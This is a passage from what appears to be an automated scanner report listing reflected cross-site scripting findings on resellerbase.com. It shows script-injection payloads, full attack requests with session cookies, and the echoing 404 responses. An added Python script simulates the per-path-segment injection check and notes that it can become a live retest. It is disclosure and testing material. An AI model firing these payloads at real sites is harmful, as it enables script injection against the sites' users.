<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php8afef<script>alert(1)</script>f7e8b78c7cf4676f3?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1098. http://www.resellerbase.com/detail/13/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ef64<script>alert(1)</script>169ff365b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/rating.php?5ef64<script>alert(1)</script>169ff365b9a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php?5ef64<script>alert(1)</script>169ff365b9a=1 was not found on this server.</p>
...[SNIP]...

2.1099. http://www.resellerbase.com/detail/13/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 975a8<script>alert(1)</script>683bd0b66f0ea5046 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/13/rating.php/975a8<script>alert(1)</script>683bd0b66f0ea5046?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php/975a8<script>alert(1)</script>683bd0b66f0ea5046?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1100. http://www.resellerbase.com/detail/13/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a09f4<script>alert(1)</script>afc89b37a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila09f4<script>alert(1)</script>afc89b37a6e/13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila09f4<script>alert(1)</script>afc89b37a6e/13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1101. http://www.resellerbase.com/detail/13/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f4ec<script>alert(1)</script>101d84f7260 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/136f4ec<script>alert(1)</script>101d84f7260/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/136f4ec<script>alert(1)</script>101d84f7260/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1102. http://www.resellerbase.com/detail/13/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d327<script>alert(1)</script>18c1f576fdb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/search.php7d327<script>alert(1)</script>18c1f576fdb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php7d327<script>alert(1)</script>18c1f576fdb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1103. http://www.resellerbase.com/detail/13/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4de5a<a>1d9217cb213 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that in the response below the <a> canary reached the same unencoded 404 echo as the <script> payloads in the preceding findings, so the script payload is worth retrying by hand in this parameter; the same applies to the keyword and opt parameters that follow.

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search4de5a<a>1d9217cb213&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...&Submit3=Search4de5a<a>1d9217cb213&opt=2 was not found on this server.</p>
...[SNIP]...

2.1104. http://www.resellerbase.com/detail/13/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 43a0b<a>1575d5088a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/13/search.php?keyword=search...43a0b<a>1575d5088a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...43a0b<a>1575d5088a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1105. http://www.resellerbase.com/detail/13/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dad29<script>alert(1)</script>6a96d55464f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search&opt=2&dad29<script>alert(1)</script>6a96d55464f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...&Submit3=Search&opt=2&dad29<script>alert(1)</script>6a96d55464f=1 was not found on this server.</p>
...[SNIP]...

2.1106. http://www.resellerbase.com/detail/13/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/13/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38df2<a>8f8503eb13b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search&opt=238df2<a>8f8503eb13b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/search.php?keyword=search...&Submit3=Search&opt=238df2<a>8f8503eb13b was not found on this server.</p>
...[SNIP]...
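
The rating.php and search.php findings above (2.1092 through 2.1106) all follow one pattern: a canary of the form <hex><probe><hex> is appended to the Nth path segment ("REST URL parameter N") or to a query parameter, and the site's 404 page echoes the request target into a <p> element unencoded. The script below is an added example, not part of this report or of the resellerbase.com application, that reproduces the check offline: it builds the per-segment injection targets the way the requests above show them, renders a constructed stand-in for the observed 404 page in both its vulnerable and an HTML-encoding form, and classifies each reflection as unmodified, encoded or absent (the "Certain" <script> probe and the "Firm" <a> probe are both handled). The canary affixes, the two renderers and all function names are assumptions made for the example. One caveat the report does not test: the scanner sent raw < and > in the request line, whereas a browser that percent-encodes those characters in the path only delivers the payload if the 404 page decodes the URI before echoing it.

```python
"""Offline reproduction of the 'REST URL parameter N' reflection check.

Added example; not code from the report or the target site. The 404
renderers below are constructed to mirror the response bodies shown
above, not copied from the application.
"""
import html
import re
from urllib.parse import urlsplit

# Canary shape used by the report: <hex prefix><probe><hex suffix>.
# The affixes are fixed here (assumption) so the output is deterministic.
PREFIX, SUFFIX = "5ef64", "169ff365b9a"
JS_PROBE = "<script>alert(1)</script>"   # probe behind "Confidence: Certain"
TAG_PROBE = "<a>"                        # probe behind "Confidence: Firm"


def canary(probe: str) -> str:
    return f"{PREFIX}{probe}{SUFFIX}"


def inject_rest_param(url: str, n: int, probe: str) -> str:
    """Append the canary to the n-th path segment (1-based), as in the
    requests above: parameter 1 of /detail/13/rating.php becomes
    /detail<canary>/13/rating.php. Any query string is preserved."""
    parts = urlsplit(url)
    segments = parts.path.split("/")          # ['', 'detail', '13', 'rating.php']
    if n < 1 or n > len(segments) - 1:
        raise ValueError(f"path has no segment {n}")
    segments[n] += canary(probe)
    target = "/".join(segments)
    return target + (f"?{parts.query}" if parts.query else "")


def vulnerable_404(request_target: str) -> str:
    """Constructed stand-in for the PHP 404 page in the responses above:
    the raw request target is interpolated straight into the body."""
    return ("<html><head><title>Error 404 - Page Not Found</title></head><body>"
            f"<p>The requested URL {request_target} was not found on this server.</p>"
            "</body></html>")


def hardened_404(request_target: str) -> str:
    """Same page with the one change that matters: HTML-encode the untrusted
    value before it lands between tags (htmlspecialchars() in PHP)."""
    return ("<html><head><title>Error 404 - Page Not Found</title></head><body>"
            f"<p>The requested URL {html.escape(request_target, quote=True)} "
            "was not found on this server.</p></body></html>")


def classify(body: str, probe: str) -> str:
    """How the canary came back: 'unmodified' (probe intact between the
    affixes), 'encoded' (affixes present, probe altered) or 'absent'."""
    if canary(probe) in body:
        return "unmodified"
    if re.search(re.escape(PREFIX) + r".*?" + re.escape(SUFFIX), body, re.S):
        return "encoded"
    return "absent"


def probe_path(url: str, render, probe: str = JS_PROBE) -> dict:
    """Inject into every path segment of url, render the simulated 404 page
    and classify each reflection, keyed the way the report labels them."""
    n_segments = len(urlsplit(url).path.split("/")) - 1
    results = {}
    for n in range(1, n_segments + 1):
        target = inject_rest_param(url, n, probe)
        results[f"REST URL parameter {n}"] = classify(render(target), probe)
    return results


if __name__ == "__main__":
    url = "http://www.resellerbase.com/detail/13/rating.php?id=13&rating=5"
    print(probe_path(url, vulnerable_404))   # every segment: 'unmodified'
    print(probe_path(url, hardened_404))     # every segment: 'encoded'
```

Swapping render for a function that performs the real HTTP request and returns the body turns this into a live retest; keep the classification step as-is so that an encoded reflection is not mistaken for a fixed one that simply moved.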

2.1107. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f43b4<script>alert(1)</script>9deb24032ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf43b4<script>alert(1)</script>9deb24032ad/13/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf43b4<script>alert(1)</script>9deb24032ad/13/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1108. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17e14<script>alert(1)</script>c1cbe1796e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1317e14<script>alert(1)</script>c1cbe1796e0/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1317e14<script>alert(1)</script>c1cbe1796e0/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1109. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8719f<script>alert(1)</script>6bff6a1aa68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes8719f<script>alert(1)</script>6bff6a1aa68/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes8719f<script>alert(1)</script>6bff6a1aa68/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1110. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3c47<script>alert(1)</script>3edfc5b4d9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmosa3c47<script>alert(1)</script>3edfc5b4d9c/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmosa3c47<script>alert(1)</script>3edfc5b4d9c/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1111. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2f1c1<script>alert(1)</script>02cff8f7ce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images2f1c1<script>alert(1)</script>02cff8f7ce/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images2f1c1<script>alert(1)</script>02cff8f7ce/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1112. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5d4a1<script>alert(1)</script>bf76be42363 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images/rating5d4a1<script>alert(1)</script>bf76be42363/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images/rating5d4a1<script>alert(1)</script>bf76be42363/0.gif was not found on this server.</p>
...[SNIP]...

2.1113. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 26704<script>alert(1)</script>5078f5ef7be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images/rating/0.gif26704<script>alert(1)</script>5078f5ef7be HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images/rating/0.gif26704<script>alert(1)</script>5078f5ef7be was not found on this server.</p>
...[SNIP]...

2.1114. http://www.resellerbase.com/detail/13/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 941da<script>alert(1)</script>1c77daabb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/themes/kosmos/images/rating/0.gif?941da<script>alert(1)</script>1c77daabb2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
